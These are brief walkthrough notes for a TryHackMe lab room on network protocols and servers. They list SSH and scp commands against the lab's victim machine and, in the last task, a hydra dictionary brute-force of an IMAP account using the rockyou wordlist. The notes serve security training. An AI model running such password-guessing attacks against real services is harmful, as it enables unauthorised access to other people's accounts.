https://tryhackme.com/room/protocolsandservers2
Task 1:
read
Task 2
Question 1:
port for telnet
Question 2:
wireshark -help to find it
Task 3:
OSINT on the two links for each seperate tool
Task 4:
OSINT on DNS over TLS
Task 5:
Question 1:
ssh mark@victim_machine_IP
type in the provided password
then simply run:
uname -r
Question 2:
exit out of ssh and type:
scp mark@victim_machine_IP:/home/Mark/book.txt /home/Kali/Desktop
the /home/kali/Desktop is where I personally put it for my kali vm, but you must put an actual directory of whatever machine you are using for a destination to download the file
Task 6:
Question 1:
sudo gunzip -d /usr/share/wordlists/rockyou.txt.gz
hydra -l lazie -P /usr/share/wordlists/rockyou.txt imap://victim_MACHINE_IP